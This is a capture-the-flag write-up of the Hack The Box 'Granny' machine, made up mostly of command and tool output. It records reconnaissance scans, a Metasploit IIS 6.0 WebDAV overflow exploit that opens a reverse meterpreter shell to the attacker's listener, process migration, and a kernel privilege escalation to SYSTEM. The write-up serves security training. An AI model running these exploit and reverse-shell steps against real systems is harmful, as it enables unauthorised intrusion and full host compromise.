HTB Granny

$nmap -T4 -A -sV -p- 10.10.10.15

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-20 10:57 CEST
Nmap scan report for 10.10.10.15
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Server Date: Mon, 20 Jul 2020 08:59:32 GMT
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.16 seconds

$nmap -p 80 --script vuln 10.10.10.15

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-20 11:00 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.15
Host is up (0.043s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /_vti_bin/: Frontpage file or folder
|   /_vti_log/: Frontpage file or folder
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|   /_vti_bin/shtml.exe: Frontpage file or folder
|   /images/: Potentially interesting folder
|_  /_private/: Potentially interesting folder
| http-frontpage-login: 
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|       
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 224.91 seconds

$gobuster dir -u 10.10.10.15 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.15
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/20 11:06:45 Starting gobuster
===============================================================
http://10.10.10.15/_private (Status: 301)
http://10.10.10.15/_vti_bin (Status: 301)
http://10.10.10.15/_vti_bin/_vti_aut/author.dll (Status: 200)
http://10.10.10.15/_vti_bin/_vti_adm/admin.dll (Status: 200)
http://10.10.10.15/_vti_bin/shtml.dll (Status: 200)
http://10.10.10.15/_vti_log (Status: 301)
http://10.10.10.15/aspnet_client (Status: 301)
http://10.10.10.15/Images (Status: 301)
http://10.10.10.15/images (Status: 301)
===============================================================
2020/07/20 11:07:10 Finished
===============================================================

$nikto -h 10.10.10.15

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    10.10.10.15
+ Target Port:        80
+ Start Time:         2020-07-20 11:08:54 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH LOCK PROPPATCH MKCOL PROPFIND UNLOCK COPY listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8018 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2020-07-20 11:16:31 (GMT2) (457 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Based on Grandpa’s vulnerability…

msf5 > search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf5 >

msf5 > use 0

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.131   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) >set rhosts 10.10.10.15 
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (176195 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.15:1030) at 2020-07-20 11:24:29 +0200

meterpreter >

meterpreter > getuid

[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > shell

[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3272 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

whoami
nt authority\network service

c:\windows\system32\inetsrv>

meterpreter > run post/multi/recon/local_exploit_suggester 

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 34 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
meterpreter > 

meterpreter > getpid

Current pid: 3112

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 140   1084  cidaemon.exe                                                    
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 588   396   svchost.exe                                                     
 680   396   svchost.exe                                                     
 732   1084  cidaemon.exe                                                    
 736   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 924   1084  cidaemon.exe                                                    
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1084  396   cisvc.exe                                                       
 1124  396   svchost.exe                                                     
 1172  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1340  396   VGAuthService.exe                                               
 1400  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1596  396   svchost.exe                                                     
 1704  396   alg.exe                                                         
 1824  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1908  396   dllhost.exe                                                     
 2268  3112  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe
 2308  588   wmiprvse.exe                                                    
 2472  588   davcdata.exe                                                    
 2492  348   logon.scr                                                       
 3112  3452  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 3452  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3524  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3936  1456  w3wp.exe                                                        

meterpreter > 

Again let’s migrate to the network service’s process 1824.

meterpreter > migrate 1824.

[*] Migrating from 3112 to 1824...
[*] Migration completed successfully.

meterpreter > getuid

Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > 

meterpreter > background 

[*] Backgrounding session 1...

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use ms14_058_track_popup_menu

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  exploit/windows/local/ms14_058_track_popup_menu  2014-10-14       normal  Yes    Windows TrackPopupMenu Win32k NULL Pointer Dereference

[*] Using exploit/windows/local/ms14_058_track_popup_menu

msf5 exploit(windows/local/ms14_058_track_popup_menu) > options 

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.131   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.8
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Launching notepad to host the exploit...
[+] Process 3664 launched.
[*] Reflectively injecting the exploit DLL into 3664...
[*] Injecting exploit into 3664...
[*] Exploit injected. Injecting payload into 3664...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.15:1031) at 2020-07-22 20:29:42 +0200

meterpreter > 

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
meterpreter > 

meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 16:12:15 +0200  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 21:19:46 +0200  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:32 +0200  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:31 +0200  NetworkService

meterpreter > 

meterpreter > cd Lakis
meterpreter > cd Desktop 
meterpreter > cat user.txt 

700cXXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > cd Administrator 
meterpreter > cd Desktop 
meterpreter > cat root.txt 

aa4bXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *